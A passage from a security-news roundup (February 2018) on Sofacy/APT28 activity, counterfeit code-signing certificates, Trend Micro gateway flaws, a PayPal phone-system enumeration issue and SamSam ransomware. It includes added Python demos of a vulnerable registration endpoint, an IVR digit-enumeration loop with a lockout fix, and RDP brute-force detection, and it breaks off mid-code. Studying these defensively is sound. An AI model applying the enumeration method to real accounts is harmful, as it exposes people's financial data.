Scaring users into thinking they had distributed prohibited materials (pornography, pedophilia, zoophilia), the site blocked the computer and demanded a fine in the form of a €500 iTunes gift card to have it unblocked.

Trust in government websites is very high, and filing of tax returns always involves submitting large quantities of personal information. Therefore, if users are sure that they are on the official tax service website, they will not hesitate to share important details about themselves. Another important aspect is that many online tax return filers are not everyday netizens, and thus know little about online fraud and cannot recognize a scam when they see one. But even regular Internet users can be wrong-footed by a tempting (and often expected) tax refund notice. Scammers take full advantage of this. In sum, always treat monetary offers with a healthy dollop of skepticism, and bookmark the official site of your country’s tax service in your browser to help avoid getting hooked by phishers.

A Slice of 2017 Sofacy Activity
25.2.2018 Kaspersky
Phishing  APT
Sofacy, also known as APT28, Fancy Bear, and Tsar Team, is a highly active and prolific APT. From their high volume 0day deployment to their innovative and broad malware set, Sofacy is one of the top groups that we monitor, report, and protect against. 2017 was not any different in this regard. Our private reports subscription customers receive a steady stream of YARA, IOC, and reports on Sofacy, our most reported APT for the year.

This high level of cyber-espionage activity goes back years. In 2011-2012, the group used a relatively tiny implant (known as “Sofacy” or SOURFACE) as their first-stage malware, which at the time had similarities with the old Miniduke implants. This made us believe the two groups were connected, although it looks like they parted ways at a certain point, with the original Miniduke group switching to the CosmicDuke implant in 2014. The division in malware was consistent and definitive from then on.

In 2013, the Sofacy group expanded their arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across 4-5 generations) and a few others. We’ve seen quite a few versions of these implants, which were relatively widespread at some point or still are. In 2015 we noticed another wave of attacks which took advantage of a new release of the AZZY implant, largely undetected by antivirus products. The new wave of attacks included a new generation of USB stealers deployed by Sofacy, with initial versions dating to February 2015. It appeared to be geared exclusively towards high profile targets.

Sofacy’s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group’s activities in 2016, especially when data from the compromise was leaked and “weaponized”. Later in 2016, their focus turned towards the Olympics, the World Anti-Doping Agency (WADA) and the Court of Arbitration for Sport (CAS), when individuals and servers in these organizations were phished and compromised. In a similar vein to past CyberBerkut activity, the attackers hid behind anonymous activist groups like “anonpoland”, and data from the victimized organizations was similarly leaked and “weaponized”.

This write-up will survey notables in the past year of 2017 Sofacy activity, including their targeting, technology, and notes on their infrastructure. No one research group has 100% global visibility, and our collected data is presented accordingly. Here, external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer’s Choice spearphishing are of interest. From where we sit, 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners, coinciding with lighter interest in Central Asian targets, and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East.

Dealer’s Choice
2017 began with a slow cleanup following the Dealer’s Choice campaign, whose technical characteristics were documented by our colleagues at Palo Alto in several stages at the end of 2016. The group spearphished targets in several waves with Flash exploits leading to their Carberp-based JHUHUGIT downloaders and further stages of malware. It seems that many recipients did not log in and pull down their emails until January 2017, when they retrieved the Dealer’s Choice spearphish. Throughout these waves, we observed that the targets had a connection, even a tangential one, to Ukrainian and NATO military and diplomatic interests.

In multiple cases, Sofacy spoofs the identity of a target, and emails a spearphish to other targets of interest. Often these are military or military-technology and manufacturing related, and here, the DealersChoice spearphish is again NATO related:

The global reach that coincided with this focus on NATO and the Ukraine couldn’t be overstated. Our KSN data showed spearphishing targets geolocated across the globe into 2017.

DealersChoice emails, like the one above, that we were able to recover from third party sources provided additional targeting insight, and confirmed some of the targeting within our KSN data:

0day Deployment(s)
Sofacy kicked off the year by deploying two 0days in one spearphish document: a Microsoft Office Encapsulated PostScript (EPS) type confusion exploit (CVE-2017-0262) and a use-after-free privilege escalation exploit (CVE-2017-0263). The group attempted to deploy this spearphish attachment to push a small 30 KB backdoor known as GAMEFISH to targets in Europe at the beginning of 2017. They took advantage of the Syrian military conflict for thematic content and file naming (“Trump’s_Attack_on_Syria_English.docx”). Again, this deployment was likely a part of their focus on NATO targets.

Light SPLM deployment in Central Asia and Consistent Infrastructure
Meanwhile in early-to-mid 2017, SPLM/CHOPSTICK/XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia. These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer, keylogger, and remoteshell functionality to a system of interest. As the latest revision of the backdoor, portions of SPLM didn’t match previous reports on SPLM/XAgent while other similarities were maintained. SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year. Targeting profiles included defense related commercial and military organizations, and telecommunications.

Targeting included TR, KZ, AM, KG, JO, UK, UZ

Heavy Zebrocy deployments
Since mid-November 2015, the threat actor referred to as “Sofacy” or “APT28” has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIt. We collectively refer to this package and related activity as “Zebrocy”, and by June 2017 we had written a few reports on its usage and development as Sofacy developers modified and redeployed incremented versions of the malware. The Zebrocy chain follows a pattern: spearphish attachment -> compiled AutoIt script (downloader) -> Zebrocy payload. In some deployments, we observed Sofacy actively developing and deploying a new package to a much smaller, specific subset of targets within the broader set.

Targeting profiles, spearphish filenames, and lures carry thematic content related to visa applications and scanned images, border control administration, and various administrative notes. Targeting appears to be widely spread across the Middle East, Europe, and Asia:

Business accounting practices and standards
Science and engineering centers
Industrial and hydrochemical engineering and standards/certification
Ministry of foreign affairs
Embassies and consulates
National security and intelligence agencies
Press services
Translation services
NGO – family and social service
Ministry of energy and industry
We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. The components were an unexpected inclusion in this particular toolset. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then encrypts certain file metadata and contents with an RC4-like cipher and writes them to a local path for later exfiltration. The stealer searches for files of 60 MB and less with these extensions:

At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its “RecordToFile” file stealer method.

Zebrocy spearphishing targets:

SPLM deployment in Central Asia
SPLM/CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting HTTP over TLS (TLSv1 and TLSv1.2), mostly deployed in the second half of 2017 by Sofacy. Earlier SPLM activity deployed 32-bit modules over unencrypted HTTP (and sometimes SMTP) sessions. In 2016 we saw fully functional, very large SPLM/X-Agent modules supporting OS X.

The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels, with slightly morphed encryption and functionality per deployment. Sofacy has selectively used SPLM/CHOPSTICK modules as second-stage implants against high-interest targets for years. In a change from previous compilations, the module was structured to inject remote shell, keylogger, and filesystem add-ons into processes running on victim systems, while keeping functionality that was originally present within the main module.

The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form. These targets include foreign affairs government organizations both localized and abroad, and defense organizations’ presence localized, located in Europe and also located in Afghanistan. One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina.

Minor changes and updates to the code were released with these deployments, including a new mutex format and the exclusive use of encrypted HTTP communications over TLS. The compiled code itself already is altered per deployment in multiple subtle ways, in order to stymie identification and automated analysis and accommodate targeted environments. Strings (c2 domains and functionality, error messages, etc) are custom encrypted per deployment.

Targets: TR, KZ, BA, TM, AF, DE, LT, NL

SPLM/CHOPSTICK/XAgent Modularity and Infrastructure
This subset of SPLM/CHOPSTICK activity leads into several small surprises that take us into 2018, to be discussed in further detail at SAS 2018. The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality, but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues. Changes in the second stage SPLM backdoor are refined, making the code reliably modular.

Infrastructure Notes
Sofacy set up and maintained multiple servers and C2s for varying durations, registering fairly recognizable domains with privacy services, registrars that accept bitcoin, fake phone numbers, phony individual names, and one-to-one email-address-to-domain registration relationships. Some of this activity and these patterns were publicly disclosed, so we expect to see more change in their process in 2018. Throughout the year, as in previous years, researchers commented publicly on Sofacy’s fairly consistent infrastructure setup.

As always, attackers make mistakes and give away hints about which providers and registrars they prefer. It is interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS, so, as an example, we may see extraneous data in their SSL/TLS certificates that gives away information about their provider or resources. Leading up to summer 2017, infrastructure was mostly created with PDR and Internet Domain Service BS Corp and their resellers. Hosting was mostly provided by Fast Serv Inc and resellers, in all likelihood because of bitcoin payment processing.

Accordingly, the server-side certificates appear to be generated locally on VPS hosts that are exclusively paid for at providers with bitcoin merchant processing. One certificate was generated locally on what appeared to be an HP-UX box, and another was generated on “8569985.securefastserver[.]com” with the email address “root@8569985.securefastserver[.]com”, as seen in the certificate for their nethostnet[.]com domain. The malware itself ignores this certificate configuration.

In addition to other IP data, this data point suggested that Qhoster (https://www.qhoster[.]com) was a VPS hosting reseller of choice at the time. It should be noted that the reseller accepted Alfa Click, PayPal, Payza, Neteller, Skrill, WebMoney, Perfect Money, Bitcoin, Litecoin, SolidTrust Pay, CashU, Ukash, OKPAY, EgoPay, paysafecard, Alipay, MG, Western Union, SOFORT Banking, QIWI and bank transfer for payment.

Sofacy, one of the most active APTs we monitor, continues to spearphish its way into targets, reportedly phishes widely for credentials, and infrequently engages in server-side activity (including host compromise with BeEF deployment, for example). KSN visibility and detections suggest a shift from their early-2017 high-volume NATO spearphish targeting towards the Middle East and Central Asia, and finally a move further east into late 2017. Their operational security is good. Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH, Zebrocy and SPLM, to name a few. Their evolving and modified SPLM/CHOPSTICK/XAgent code is a long-standing part of Sofacy activity; however, much of it is changing. We'll cover more recent 2018 changes in their targeting and in the malware itself at SAS 2018.

With a group like Sofacy, once its attention on a network is detected, it is important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services like email and VPN access. To identify their presence, you can gain valuable insight into their targeting from intelligence reports and powerful detection capability with hunting tools like YARA, but out-of-band processing with a solution like KATA is also important.

Technical Appendix
Related md5

Related domains

Counterfeit Code-Signing certificates even more popular, but still too expensive
25.2.2018 securityaffairs  Krypto

Code-signing certificates are precious commodities in the criminal underground; they are used by vxers to sign malware so that it evades detection.
Code-signing certificates are among the most precious commodities in the criminal underground, because they allow vxers to sign malware so that it evades detection. Operators of the major black markets in the darknets buy and sell code-signing certificates, but according to research by threat intelligence firm Recorded Future, the prices are too high for most hackers.

Cybercriminals use the Dark Web to sell high-grade code-signing certificates, obtained from trusted certificate authorities, to anyone interested in purchasing them.

Sales of code-signing certificates have increased considerably since 2015, when IBM X-Force researchers published best-practice guidance on checking for trusted certificates.

Digital certificates allow companies to trust the source of a piece of software and to check its integrity. The certificates are issued by certificate authorities (CAs) to companies that produce code, protocols or software, so that they can sign their code and attest to its legitimacy and origin.

Using signing certificates is similar to the hologram seal on software packaging, assuring buyers that the product is genuine and comes from a trusted publisher. Users receive a warning when they attempt to install files that are not accompanied by a valid certificate. This is why cybercriminals aim to use certificates to legitimize the malware they write.

According to Andrei Barysevich, Director of Advanced Collection at Recorded Future, most of the code-signing certificates traded by hackers are obtained through fraud, not from security breaches suffered by the CAs.

“Recorded Future’s Insikt Group investigated the criminal underground and identified vendors currently offering both code signing certificates and domain name registration with accompanying SSL certificates.” states the report published by Recorded Future.

“Contrary to a common belief that the security certificates circulating in the criminal underground are stolen from legitimate owners prior to being used in nefarious campaigns, we confirmed with a high degree of certainty that the certificates are created for a specific buyer per request only and are registered using stolen corporate identities, making traditional network security appliances less effective.”

Cybercriminals offer the commodity via online shops; when a buyer places an order, the shop's operators use the stolen identity of a legitimate company and its employees to request a certificate for a fake app or website from a CA (e.g. Comodo, Thawte or Symantec). The resulting certificates are used as TLS server certificates for HTTPS sites or to sign applications.

Recorded Future’s Insikt Group investigated the criminal ecosystem and identified vendors currently offering both code signing certificates and domain name registration with accompanying SSL certificates.

The researchers identified four well-known vendors operating since 2011, only two vendors are currently still active in Russian-speaking crime forums.

“One of the first vendors to offer counterfeit code signing certificates was known as C@T, a member of a prolific hacking messaging board.” continues the report. “In March 2015, C@T offered for sale a Microsoft Authenticode capable of signing 32/64b versions of various executable files, as well as Microsoft Office, Microsoft VBA, Netscape Object Signing, and Marimba Channel Signing documents, and supported Silverlight 4 applications. Additionally, Apple code signing certificates were also available.”


Prices for code-signing certificates range from $299 to $1,799; the most expensive items are fully authenticated domains with EV SSL certificates and code-signing capabilities.

“Standard code signing certificates issued by Comodo that do not include SmartScreen reputation rating cost $295. A buyer interested in the most trusted version of an EV certificate issued by Symantec would have to pay $1,599, a 230 percent premium compared to the price of the authentic certificate.” continues the report.

“For those seeking to purchase in bulk, fully authenticated domains with EV SSL encryption and code signing capabilities could also be arranged for $1,799”

code-signing certificates offer

According to Recorded Future, code-signing certificates are not widespread among malware developers because of their high price.

Vxers prefer to pay less for other AV-evasion tools, such as crypters (readily available at $10-$30), which represent a good compromise between cost and effectiveness.

“Unlike ordinary crypting services readily available at $10-$30 per each encryption, we do not anticipate counterfeit certificates to become a mainstream staple of cybercrime due to its prohibitive cost.” concluded the report. “However, undoubtedly, more sophisticated actors and nation-state actors who are engaged in less widespread and more targeted attacks will continue using fake code signing and SSL certificates in their operations”

A dozen vulnerabilities discovered in Trend Micro's Linux-based Email Encryption Gateway
25.2.2018 securityaffairs 

Security researchers at Core Security have discovered a dozen vulnerabilities in Trend Micro's Linux-based Email Encryption Gateway.
Security researchers at Core Security have discovered a dozen flaws in Trend Micro's Linux-based Email Encryption Gateway, some of them rated critical or high severity. The flaws were assigned CVE-2018-6219 through CVE-2018-6230.

The most severe flaws could be exploited by a remote, unauthenticated attacker who can reach the appliance's web console to execute arbitrary commands with root privileges.

“Encryption for Email Gateway [1] is a Linux-based software solution providing the ability to perform the encryption and decryption of email at the corporate gateway, regardless of the email client, and the platform from which it originated. The encryption and decryption of email on the TMEEG client is controlled by a Policy Manager that enables an administrator to configure policies based on various parameters, such as sender and recipient email addresses,” states Core Security.

“Multiple vulnerabilities were found in the Trend Micro Email Encryption Gateway web console that would allow a remote unauthenticated attacker to gain command execution as root.”

Trend Micro Email Encryption Gateway

The most serious vulnerability is CVE-2018-6223, missing authentication for appliance registration. Administrators configure the virtual appliance running Email Encryption Gateway during deployment via a registration endpoint.

The researchers discovered that attackers can access the endpoint without authentication to set administrator credentials and make other changes to the configuration.

“The registration endpoint is provided for system administrators to configure the virtual appliance upon deployment. However, this endpoint remains accessible without authentication even after the appliance is configured, which would allow attackers to set configuration parameters such as the administrator username and password.” continues the analysis.
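The flaw class described above is easy to reproduce in miniature: a first-boot setup endpoint that never checks whether setup has already completed. The following is an added example written for this page, not Trend Micro's code; the appliance state, the request shape, the password hashing and the session handling are all assumptions made for the demonstration. It places the behaviour described in the advisory summary (any caller can overwrite the administrator credentials at any time) beside a hardened variant that accepts an unauthenticated request only while the appliance is still unconfigured.

```python
"""Registration endpoint that stays open after setup (as described) versus one
that locks itself after first boot. Added example for this page; not Trend
Micro's code. State, request shape, hashing and sessions are assumptions."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Set


class ApplianceState:
    """Minimal stand-in for the appliance's persisted configuration."""

    def __init__(self) -> None:
        self.configured: bool = False
        self.admin_user: Optional[str] = None
        self.admin_pw_hash: Optional[str] = None
        self.sessions: Set[str] = set()


def _hash_pw(password: str) -> str:
    # Demo only: a real appliance should use a slow, salted KDF (scrypt/argon2).
    return hashlib.sha256(password.encode()).hexdigest()


def register_vulnerable(state: ApplianceState, request: Dict[str, str]) -> int:
    """Behaviour as described in the advisory summary: no authentication and no
    'already configured' check, so any caller can replace the administrator."""
    state.admin_user = request["username"]
    state.admin_pw_hash = _hash_pw(request["password"])
    state.configured = True
    return 200


def register_hardened(state: ApplianceState, request: Dict[str, str]) -> int:
    """Accept an unauthenticated request only while the appliance is still
    unconfigured (first boot). Afterwards the endpoint demands a valid
    administrator session, so it cannot be used to reset credentials."""
    if state.configured:
        token = request.get("session")
        if token is None or token not in state.sessions:
            return 403
    state.admin_user = request["username"]
    state.admin_pw_hash = _hash_pw(request["password"])
    state.configured = True
    return 200


def login(state: ApplianceState, username: str, password: str) -> Optional[str]:
    """Return a session token for a correct administrator credential pair."""
    if not state.configured or username != state.admin_user:
        return None
    if not hmac.compare_digest(state.admin_pw_hash, _hash_pw(password)):
        return None
    token = secrets.token_hex(16)
    state.sessions.add(token)
    return token


def demo() -> Dict[str, object]:
    """First-boot setup on both variants, then an unauthenticated attempt to
    replace the administrator, then a legitimate authenticated change."""
    setup = {"username": "admin", "password": "correct horse battery staple"}
    attack = {"username": "attacker", "password": "owned"}

    vuln = ApplianceState()
    register_vulnerable(vuln, setup)
    vuln_status = register_vulnerable(vuln, attack)

    hard = ApplianceState()
    register_hardened(hard, setup)
    attack_status = register_hardened(hard, attack)
    admin_after_attack = hard.admin_user
    token = login(hard, "admin", setup["password"])
    legit_status = register_hardened(
        hard, {"username": "admin2", "password": "new pass", "session": token})

    return {
        "vulnerable_attack_status": vuln_status,      # 200: attacker is now admin
        "vulnerable_admin": vuln.admin_user,
        "hardened_attack_status": attack_status,      # 403: rejected after setup
        "hardened_admin_after_attack": admin_after_attack,
        "hardened_legit_status": legit_status,        # 200 with a valid session
        "hardened_admin_final": hard.admin_user,
    }
```

The hardened variant still exposes the endpoint; the stricter option, which the advisory's description of a deployment-only endpoint implies, is to disable the route entirely once `configured` is set and require the console's normal authenticated settings pages for any later change.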

The experts also discovered two high-severity cross-site scripting (XSS) vulnerabilities, an arbitrary file write issue that can lead to command execution, an arbitrary log-file location issue leading to command execution, and unvalidated software updates.

Remaining flaws discovered by the researchers include SQL and XML external entity (XXE) injections.

Affected versions are Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) and earlier; Trend Micro addressed ten of the twelve vulnerabilities in version 5.5 build 1129.

According to the advisory timeline, more than eight months passed between Core Security's initial notification and publication of the advisory.

2017-06-05: Core Security sent an initial notification to Trend Micro, including a draft advisory.
2017-11-13: Core Security asked again (4th time) for an ETA for the official fix. We stated we need a release date or a thorough explanation on why after five months there is still no date defined. If there is no such answer we will be forced to publish the advisory.
2018-02-21: Advisory CORE-2017-0006 published.
Trend Micro confirmed that a medium severity CSRF issue and a low severity SQL injection vulnerability have not been patched due to the difficulties of implementing a fix.

Czech President wants Russian hacker Yevgeni Nikulin extradited to Russia instead of US
25.2.2018 securityaffairs  BigBrothers

Czech President Milos Zeman wants the Russian hacker Yevgeni Nikulin extradited to Russia instead of the US; Nikulin is wanted by the US on hacking charges and by Russia on fraud charges.
Yevgeni Nikulin (29) is sought by the US for alleged cyber attacks on social networks and by the Russian authorities, who have charged him with fraud.

According to US authorities, the man targeted LinkedIn and Formspring and hacked into the file hosting service Dropbox.

The Russian national was arrested in Prague in October 2016 in a joint international operation with the FBI.

The case sits in the middle of an arm-wrestling match between Moscow and Washington: the US Government accuses Russia of having interfered in the 2016 presidential election through hacking.

Yevgeni Nikulin
Source: US Defense Watch.com

In May 2017, a Czech court ruled that Nikulin can be extradited to either Russia or the United States, leaving the final decision to Justice Minister Robert Pelikan.

“It is true there have been two meetings this year where the president asked me not to extradite a Russian citizen to the United States but to Russia,” the website of the weekly newspaper Respekt quoted Pelikan as saying.

In 2016, Pelikan refused to extradite two Lebanese citizens charged by a US court with several crimes, including the sale of ground-to-air missiles and cocaine trafficking.

“Respekt also quoted Babis, who professes a strong pro-EU and NATO stance, as saying earlier this month he would prefer Nikulin to be sent to the United States, but had no power over the decision. His spokeswoman declined comment.” reported the New York Times.

Zeman, who was re-elected in January, is known for his pro-Russian line and his opposition to the Western sanctions imposed on Russia over its 2014 annexation of Crimea.

The Respekt site said that last week Pelikan received Vratislav Mynar, the head of Zeman's office.

“It’s none of your business, but I have handed the minister a letter from the detained Nikulin’s mother,” Mynar told aktualne.cz.

Nikulin’s lawyer Martin Sadilek told AFP that Nikulin alleges that FBI investigators had tried twice to persuade him to confess to cyberattacks on the DNC.

Paypal issue allows disclosure of account balance and recent transactions
24.2.2018 securityaffairs Safety

A PayPal issue allows enumeration of the last four digits of the payment method and disclosure of the account balance and recent transactions of any given PayPal account.
This post details an issue which allows for enumeration of the last four digits of the payment method (such as a credit or debit card) linked to any given PayPal account, and for disclosure of that account's balance and recent transactions.

This attack was submitted to PayPal's bug bounty program, where it was classified as out of scope, which would admittedly be unavailing to refute since the program scope does not mention anything about attacks on their interactive voice response system.

PayPal ticket

Prerequisites and Reconnaissance
To get started, the attacker requires two pieces of information about the account: the e-mail address and the phone number linked to it.

Armed with knowledge of the e-mail address and phone number linked to an account, the attacker would visit the Forgot Password page on PayPal’s website, and enter the e-mail address associated with the targeted account.

The attacker is then shown the type of card linked to the account, as well as its last two digits.

PayPal - Forgot Password

Attacking the Interactive Voice Response System
At first glance, the interactive voice response (IVR) system on PayPal's phone-based customer support allows a maximum of three attempts at submitting the correct last four digits per phone call.

However, if the first attempt is incorrect, the caller is not notified of a successful submission on subsequent attempts during the same call. This makes any additional attempts within a call purely cosmetic.

To get around this presumed limitation, the attacker makes only one attempt at a possible combination of the last four digits per phone call.

PayPal - Customer Support

Limiting the number of attempts to one submission per phone call also makes enumerating the correct combination more time-efficient, and it makes it easy to distinguish a correct attempt from an incorrect one.

Furthermore, having tested this theory with my own account, I was able to conclude that there is no limit on the number of submission attempts which can be made in this manner, meaning that hypothetically an attacker could call 10,000 times to enumerate the last four digits entirely on their own.

That would, however, disregard the last two digits retrieved from the Forgot Password page, knowledge of which makes the attack far more feasible by reducing the number of possible combinations from 10,000 to just 100.

Once the correct combination of the last four digits has been found, the attacker would simply have to use the interactive voice response system to retrieve information about the account.

After the correct last four digits have been entered, the account's current balance is automatically read off by the machine.

Additionally, to retrieve information about recent transactions, the attacker simply has to say “recent transactions”, and they are read off as well.

Attack Efficacy and Efficiency
If the aforementioned prerequisites are met, an attacker can, without fail, enumerate the correct last four digits of the payment method linked to an account. This information can then be used to retrieve the account's current balance and recent transactions.

Moreover, after timing various attempts at submission of the last four digits, it was found that an attempt takes around 30 seconds on average. The fastest possible time was 27 seconds per phone call.

Taking the fastest possible time as our average, enumerating all possible combinations from 00XX to 99XX would take at most around 45 minutes (100 calls at 27 seconds each). This time could be halved by adding a second phone and making calls in parallel.
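The arithmetic above follows directly from one property of the IVR: attempts are counted per call, so a caller who places one guess per call is never rate limited. The following is an added example written for this page, not code from the original post or from PayPal. It models the oracle as described (only the first guess of a call is verified, the balance is read back on a match, 27 seconds per call) and runs the attacker's loop against it; the cross-call lockout is an assumed fix that the post does not propose, included to show how a per-account counter changes the outcome. The account data is constructed.

```python
"""IVR last-four-digits oracle as described in the write-up, plus an assumed
cross-call lockout. Added example; not PayPal's code or the original post's."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

SECONDS_PER_CALL = 27   # fastest observed call duration in the write-up
CANDIDATES = 100        # 00XX .. 99XX once the last two digits are known


@dataclass
class Account:
    phone: str
    last_four: str
    balance: str
    failed_calls: int = 0   # counted across calls (hardened variant only)
    locked: bool = False


class Ivr:
    """lockout_after=None reproduces the described behaviour: attempts are only
    counted within a call, so one guess per call is never rate limited."""

    def __init__(self, accounts: Dict[str, Account], lockout_after: Optional[int] = None):
        self.accounts = accounts
        self.lockout_after = lockout_after

    def call(self, phone: str, guess: str) -> Optional[str]:
        """One phone call carrying a single guess. Returns the balance read back
        on a correct guess, None otherwise."""
        acct = self.accounts[phone]
        if acct.locked:
            return None
        if guess == acct.last_four:
            acct.failed_calls = 0
            return acct.balance
        acct.failed_calls += 1
        if self.lockout_after is not None and acct.failed_calls >= self.lockout_after:
            acct.locked = True   # assumed fix: lock after N failed calls per account
        return None


def enumerate_last_four(ivr: Ivr, phone: str, known_last_two: str,
                        phones: int = 1) -> Tuple[Optional[str], int, float]:
    """Attacker loop: one guess per call, candidates in numeric order. Returns
    (last_four or None, calls placed, wall-clock seconds with `phones` handsets
    dialling in parallel). Stops early if the IVR reports the account locked."""
    calls = 0
    for prefix in range(CANDIDATES):
        guess = f"{prefix:02d}{known_last_two}"
        calls += 1
        if ivr.call(phone, guess) is not None:
            return guess, calls, calls * SECONDS_PER_CALL / phones
        if ivr.accounts[phone].locked:
            break
    return None, calls, calls * SECONDS_PER_CALL / phones


def worst_case_minutes(phones: int = 1) -> float:
    """Full sweep of the 100 candidates: 45.0 minutes with one phone."""
    return CANDIDATES * SECONDS_PER_CALL / phones / 60


def demo() -> Tuple[Tuple[Optional[str], int, float], Tuple[Optional[str], int, float]]:
    # Constructed target: card ending 4289, Forgot Password page leaked "89".
    target = Account("+15555550100", "4289", "USD 1,250.00")
    vulnerable = Ivr({target.phone: Account(**vars(target))})
    hardened = Ivr({target.phone: Account(**vars(target))}, lockout_after=5)
    return (enumerate_last_four(vulnerable, target.phone, "89"),
            enumerate_last_four(hardened, target.phone, "89"))
```

Against the described behaviour the loop recovers the digits on the 43rd call (about 19 minutes); with a five-failure per-account lockout it is stopped after five calls, which is the control the per-call attempt counter only appears to provide.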

Possible Fixes
Users should be allowed to opt into privacy settings that keep the amount of data revealed on the Forgot Password page to a minimum, similar to how Twitter lets users hide the email address and/or phone number linked to their account when attempting to reset its password.

It would also be similar to how Facebook allows users to choose whether their full names show up or not when their e-mail address is entered on the password reset page.

Alternatively, the last two digits of the credit or debit card, if they need to be shown at all, could be shown only when the request meets certain criteria, such as when it comes from a recognized device or location.

This issue allows for enumeration of the last four digits of the payment method on an account, which then allows for the disclosure of the account’s current balance and recent transactions.

An attacker with knowledge of the targeted account’s email address and phone number would first use PayPal’s Forgot Password page to retrieve the last two digits of the payment method linked to the account.

The attacker would then be able to enumerate the last four digits (or rather the first two of the last four) of the payment method on the account by making phone calls to PayPal's phone-based customer support and interacting with the interactive voice response system.

Once the attacker has successfully enumerated the last four digits of credit/debit card or bank account linked to the account, they would then be able to query the current account balance and recent transaction information at will.

Lastly, I would like to note that since no human interaction is required or involved in the attack, it is essentially a backdoor into PayPal accounts, allowing attackers to query the current balance and recent transaction information of any given account at any time.

Czech President Wants Hacker 'Extradited to Russia' Not US
24.2.2018 securityweek BigBrothers

The Czech Republic's pro-Moscow president has repeatedly lobbied for a Russian hacker held in Prague and wanted by the US to be extradited to Russia, the justice minister was quoted as saying Saturday.

Yevgeni Nikulin, sought by the US for alleged cyberattacks on social networks and also by his native Russia on fraud charges, has been in a Prague prison since he was arrested in the Czech capital in October 2016 in a joint operation with the FBI.

The case comes amid accusations by Washington that Russia tried to "interfere" through hacking in the 2016 US election won by Donald Trump, charges the Kremlin has dismissed.

Last May, a Prague court ruled that the 30-year-old Nikulin can be extradited to either Russia or the United States, with the final say left to Justice Minister Robert Pelikan.

"It's true that there have been two meetings this year at which the president (Milos Zeman) asked me to extradite a Russian citizen not to the United States, but to Russia," Pelikan told the aktualne.cz news site.

The site said the meetings had taken place in January, while earlier this week Pelikan received Vratislav Mynar, the head of Zeman's office, who also lobbied for Nikulin's extradition to Russia.

"It's none of your business, but I have handed the minister a letter from the detained Nikulin's mother," Mynar told aktualne.cz.

Zeman's spokesman Jiri Ovcacek declined to comment on the matter when asked by AFP.

Following Nikulin's arrest, Moscow accused Washington of harassing its citizens and vowed to fight Nikulin's extradition.

It then issued a separate arrest warrant for him over alleged theft from the WebMoney settlement system.

The US has charged Nikulin with hacking into social networks LinkedIn and Formspring and into the file hosting service Dropbox, Nikulin's lawyer Martin Sadilek told AFP earlier.

He also said Nikulin alleges that FBI investigators had tried twice to persuade him to confess to cyberattacks on the US Democratic Party.

Zeman, a 73-year-old ex-communist with strong pro-Russian, pro-Chinese and anti-Muslim views, won a second five-year term in a presidential vote in January.

2,000 Computers at Colorado DOT were infected with the SamSam Ransomware
24.2.2018 securityaffairs

SamSam ransomware hit the Colorado DOT: the Department of Transportation shut down 2,000 computers after the infection.
SamSam ransomware made the headlines again; this time it infected over 2,000 computers at the Colorado Department of Transportation (CDOT).

The DOT has shut down the infected workstations and is working with security firm McAfee to restore normal operations. Officials confirmed the ransomware demanded a bitcoin payment.

“The Colorado Department of Transportation has ordered an estimated 2,000 employees to shut down their computers following a ransomware attack Wednesday morning.” wrote the CBS Denver.

The CDOT spokesperson Amy Ford said employees were instructed to turn off their computers at the start of business Wednesday after ransomware infiltrated the CDOT network.

“We’re working on it right now,” added Ford.

The good news is that crucial systems at the Colorado DOT, such as surveillance cameras and traffic alerts, were not affected by the ransomware.

David McCurdy, OIT’s Chief Technology Officer, issued the following statement:

“Early this morning state security tools detected that a ransomware virus had infected systems at the Colorado Department of Transportation. The state moved quickly to quarantine the systems to prevent further spread of the virus. OIT, FBI and other security agencies are working together to determine a root cause analysis. This ransomware virus was a variant and the state worked with its antivirus software provider to implement a fix today. The state has robust backup and security tools and has no intention of paying ransomware. Teams will continue to monitor the situation closely and will be working into the night.”

The Colorado DOT officials confirmed that the agency will not pay the ransom and it will restore data from backups.

SamSam is not a new threat: attacks were observed as early as 2015, and the list of victims is long, many of them in the healthcare industry. The attackers spread the malware after gaining access to a company's internal network by brute-forcing RDP connections.
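Because the initial access described above is a credential brute force against RDP, it leaves a loud trail in the Windows Security log before any file is encrypted. The following is an added example written for this page, not part of the article or of any vendor product: detection logic run over a constructed, simplified export of logon events. The field meanings follow the Windows schema (event 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive, i.e. RDP), but every sample line, account name and address is invented.

```python
"""RDP brute-force detection over simplified Windows logon events.
Added example for this page; sample data is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: <timestamp> <event id> <logon type> <account> <source ip>
SAMPLE_EVENTS = """\
2018-02-21T02:00:01 4625 10 administrator 203.0.113.7
2018-02-21T02:00:03 4625 10 admin 203.0.113.7
2018-02-21T02:00:06 4625 10 administrator 203.0.113.7
2018-02-21T02:00:09 4625 10 scanner 203.0.113.7
2018-02-21T02:00:12 4625 10 backup 203.0.113.7
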